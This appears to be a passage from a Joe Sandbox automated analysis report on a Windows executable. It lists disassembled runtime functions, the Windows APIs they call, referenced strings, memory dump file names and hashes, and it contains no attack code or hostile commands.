APIs

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1A494A86
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A494AE4

Strings

csm, xrefs: 00007FFE1A494B8A

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
Instruction ID: 14119995dc47e694014b7b492482a77a9dbbec41658de7960b08dcc758ea705f
Opcode Fuzzy Hash: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
Instruction Fuzzy Hash: DA511A76718A4186D6709B16E04027E77A4F78CBA0F1005B6DB8E07B66DF3DE474CB00

Function 00007FF6399C832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C835E

Part of subcall function 00007FF6399C9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
Part of subcall function 00007FF6399C9C58: GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6399BBEC5), ref: 00007FF6399C837C

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00007FF6399C836A

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\file.exe
API String ID: 3580290477-1957095476
Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction ID: 5bae80b123212536b551d111b4e4cac4631b50baeae0a1394f1341ae5d065547
Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction Fuzzy Hash: 5C419F32E08B52D5E714DF26A8800BC63DAEF45794B595035EA4E87BCBDE3DE481AF00

Function 00007FFDFF1724D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF161DA0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFDFF168732,?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA), ref: 00007FFDFF161DE8

InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00000000,00007FFDFF1681F2,?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF1AF296
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00000000,00007FFDFF1681F2,?,?,?,?,?,00007FFDFF167EF2), ref: 00007FFDFF1AF2AC

Strings

InitializeCriticalSectionEx, xrefs: 00007FFDFF1AF2A2

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressAllocCountCriticalHeapInitializeProcSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 1188775705-3084827643
Opcode ID: e232a6cadf58541bcf4445efba49f07ddff1b408011c8cf896b94f6870ce2d59
Instruction ID: 7dd751c765d958365f2191dde7d365f509eb5ba644a249e8c31af9f58aa30ee6
Opcode Fuzzy Hash: e232a6cadf58541bcf4445efba49f07ddff1b408011c8cf896b94f6870ce2d59
Instruction Fuzzy Hash: 6A41B027F18B5282EB148F25E4209A927A1BB59BA4F444336DA7D8B3DCDF7CE505C700

Function 00007FF6399CF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CF916

Part of subcall function 00007FF6399CE8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF6399CE908

Strings

:, xrefs: 00007FF6399CF956
., xrefs: 00007FF6399CF967

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: b6b8c772600cbdc70794b2d8941224a301ca0a48622a5d5cb6a155d5a472d289
Instruction ID: bf4df4939de93dd06d8182bfc04cc0b878e9c252535723f49fa895a2b8b456d2
Opcode Fuzzy Hash: b6b8c772600cbdc70794b2d8941224a301ca0a48622a5d5cb6a155d5a472d289
Instruction Fuzzy Hash: B5412A22F08A5298FB119FA19C511BC27B6AF14758F580039DE4DA7BCEEF389446AF10

Function 00007FF6399CBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6399CC05F
GetLastError.KERNEL32 ref: 00007FF6399CC081

Strings

U, xrefs: 00007FF6399CC00B

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction ID: 110170fbe8a2db689817185d1bdf7057fc3ee052df3ceb1c1dbebc7ab13ebe1f
Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction Fuzzy Hash: 16418322A19A4686DB20DF25E8443A97761FB98B94F484031EA4DC779DEF3CD441DF40

Function 00007FFDFF20439C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99fileCOMMON

Download Yara Rule

APIs

WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFF2044AB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF2044D0

Strings

U, xrefs: 00007FFDFF204454

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 911a656b47599e8a557d981409cc42cdec7e42ce3219a79a140008da2bdc3c5a
Instruction ID: 359e567d4da763d0d867b02f2008bf0def27d5bd90623df46569167a150eeac0
Opcode Fuzzy Hash: 911a656b47599e8a557d981409cc42cdec7e42ce3219a79a140008da2bdc3c5a
Instruction Fuzzy Hash: A641B223B19A8196DB209F25E454BB967A0FB88784F854231EE6DC379CDF3CD401C740

Function 00007FFDFF152D1D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFDFF152DFF
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF152E11

Strings

InitializeCriticalSectionEx, xrefs: 00007FFDFF152E07

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressCountCriticalInitializeProcSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 1498394645-3084827643
Opcode ID: ca74f364f2a4fbbce852ed4f3a260196818a35d47723d4fae43e135a95bcf3ea
Instruction ID: 996acb4fd4ecb25a5d636ac22d30256f4856455520d6ae1a45827a2871501a30
Opcode Fuzzy Hash: ca74f364f2a4fbbce852ed4f3a260196818a35d47723d4fae43e135a95bcf3ea
Instruction Fuzzy Hash: B731AE23F18A0242FB549B24E831EB923A1AB95B94F481331D93DC77DDDF6CE6029350

Function 00007FFDFF1C84DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF16FD08: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FD4C

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF1C8550

Strings

LCIDToLocaleName, xrefs: 00007FFDFF1C8538
LocaleNameToLCID, xrefs: 00007FFDFF1C8546

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: LCIDToLocaleName$LocaleNameToLCID
API String ID: 2574300362-2637756803
Opcode ID: 0803b4db6aee0f16591652c5522d05e38b3eba4bd52439a25a26e92b485ce620
Instruction ID: 9fbcaec5bc28a4a4c74a8e69436d0045b290e7c06504d10adde302ae45dc512c
Opcode Fuzzy Hash: 0803b4db6aee0f16591652c5522d05e38b3eba4bd52439a25a26e92b485ce620
Instruction Fuzzy Hash: 7331C252F08B0246FB049B15E8B0AB963A1AB49BA0F444335DE3DD77DDEF6CE9018604

Function 00007FFDFF15278C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF16FD08: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FD4C

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,00000000,00007FFDFF152768), ref: 00007FFDFF1527EA

Strings

EnumSystemLocalesEx, xrefs: 00007FFDFF1527E0
LCIDToLocaleName, xrefs: 00007FFDFF1AEADA

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumSystemLocalesEx$LCIDToLocaleName
API String ID: 2574300362-3704287933
Opcode ID: ba5c36623fc25013090e7993a8c381ecf7052ca350d415b47eab9563a37f7c19
Instruction ID: 67ebe505861148c98fee06d52ecd9c6422b6a083d0666e1e03365f7ede0b2c5c
Opcode Fuzzy Hash: ba5c36623fc25013090e7993a8c381ecf7052ca350d415b47eab9563a37f7c19
Instruction Fuzzy Hash: 8A219562B19A4142FB409B25E8719AA23A1BB84794F445335EE3DCB7ECDF7CE909C740

Function 00007FFE1A499F44 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A042

Strings

void , xrefs: 00007FFE1A499FCC
void, xrefs: 00007FFE1A499FA4

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
Instruction ID: 80ac3f7184da617a04ae9728b234e2331aebc4b7c9f68e3d4b9cdfc8d991f8bd
Opcode Fuzzy Hash: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
Instruction Fuzzy Hash: 7B314766F18B6688FB21CFA1D8410FC77B0BB48B58B4401B6EA4E52B69DF3C9165C750

Function 00007FFDFF19971C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19981A

Strings

void, xrefs: 00007FFDFF19977C
void , xrefs: 00007FFDFF1997A4

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: f798b663d1d366c9a3d4dbe8706d2eaf5543caf91456b5b9ccc61436d71a93af
Instruction ID: a1f03329b72c78be29da685077d8deba697cf1e79e5cfcd1ac160d724c14498a
Opcode Fuzzy Hash: f798b663d1d366c9a3d4dbe8706d2eaf5543caf91456b5b9ccc61436d71a93af
Instruction Fuzzy Hash: 9F310872F18A5598FB20CF64E8504FC37B0BB48748B844636DE6D52B9DDF3891448790

Function 00007FFDFF1C83D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF16FD08: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FD4C

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,00000001,00007FFDFF1CA199,?,?,?,00000000,?,00000092,?), ref: 00007FFDFF1C8444

Strings

LCMapStringEx, xrefs: 00007FFDFF1C842C
LCIDToLocaleName, xrefs: 00007FFDFF1C843A

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: LCIDToLocaleName$LCMapStringEx
API String ID: 2574300362-3928102921
Opcode ID: e70c7fa6973260308ae2a21681d1779fac78ec1465bd49ba5b862f673e906f43
Instruction ID: 8c5aeff965820fb3958a5de2156274195eb999575fe17fec4deed9921ca46956
Opcode Fuzzy Hash: e70c7fa6973260308ae2a21681d1779fac78ec1465bd49ba5b862f673e906f43
Instruction Fuzzy Hash: 8621A362B08A1682FB548B25E871AB923A2AB54BD0F444335DD3DC77EDEF2CED458244

Function 00007FF6399CE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6399CE908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6399CE95A

Strings

:, xrefs: 00007FF6399CE91E

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction ID: 24cf6ba67ea5c256184b69b44759779ed0ed284c860266d794b2077cc1ed7231
Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction Fuzzy Hash: 10219E22E0868686EB609F15D84427D63A6FB84B84F494035DA8E837CADF7CE9459F41

Function 00007FFDFF15369C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00002000,00007FFDFF1547FD,?,?,?,00007FFDFF15489D,?,?,?,00007FFDFF152187), ref: 00007FFDFF15374F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,00002000,00007FFDFF1547FD,?,?,?,00007FFDFF15489D,?,?,?,00007FFDFF152187), ref: 00007FFDFF153761

Strings

InitializeCriticalSectionEx, xrefs: 00007FFDFF153757

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressCountCriticalInitializeProcSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 1498394645-3084827643
Opcode ID: e95f46591836bfef6ea8e9b52ae07cfd2556bd6caec39befdffa82f31667d537
Instruction ID: e670e76f75a58e29291c20ef7f39a58ad8201d3b04c93ff0bda94705f5c94848
Opcode Fuzzy Hash: e95f46591836bfef6ea8e9b52ae07cfd2556bd6caec39befdffa82f31667d537
Instruction Fuzzy Hash: B0219052F28A4242FB189B15E830D752392AB99B94F485335EC3DC77DCEF2CEA018740

Function 00007FFDFF1704B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF164BB5), ref: 00007FFDFF17051B

Strings

AreFileApisANSI, xrefs: 00007FFDFF1AEBBA
CompareStringEx, xrefs: 00007FFDFF170511

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressProc
String ID: AreFileApisANSI$CompareStringEx
API String ID: 190572456-3979650549
Opcode ID: 8f5e00e8bc3fcc6d6482da936738e72db5bac2fd5d85fca9cbb876784aa39933
Instruction ID: bbd6c56f118ba6837ea4d3c163ea4674e647a2c5ce3cdf5ca5d1f41c570ac054
Opcode Fuzzy Hash: 8f5e00e8bc3fcc6d6482da936738e72db5bac2fd5d85fca9cbb876784aa39933
Instruction Fuzzy Hash: E9119D93F08B4642FB159769A9319B513919F49790F445335DD3DCB3D9EF2CEA408340

Function 00007FFE1A4962EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A496690: RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A4966D4
Part of subcall function 00007FFE1A496690: RaiseException.KERNEL32 ref: 00007FFE1A49671A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A49635F

Strings

Bad dynamic_cast!, xrefs: 00007FFE1A496312
Access violation - no RTTI data!, xrefs: 00007FFE1A4962EF

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: 7bbd72394c3e749fc10370465baa4d9a755cb91736d17097c685b3404c0deaff
Instruction ID: dd5b71e3bf9d81ee4e25c0650c5f3ace95da53f97f04792fcc54c256829009cc
Opcode Fuzzy Hash: 7bbd72394c3e749fc10370465baa4d9a755cb91736d17097c685b3404c0deaff
Instruction Fuzzy Hash: AF014C65B29E8691EE709F16E4511B8A320EF88FA4F4050F3E64F066B5EF6CE534C700

Function 00007FF6399BF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6399BF0B8
RaiseException.KERNEL32 ref: 00007FF6399BF0F9

Strings

csm, xrefs: 00007FF6399BF0E6

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

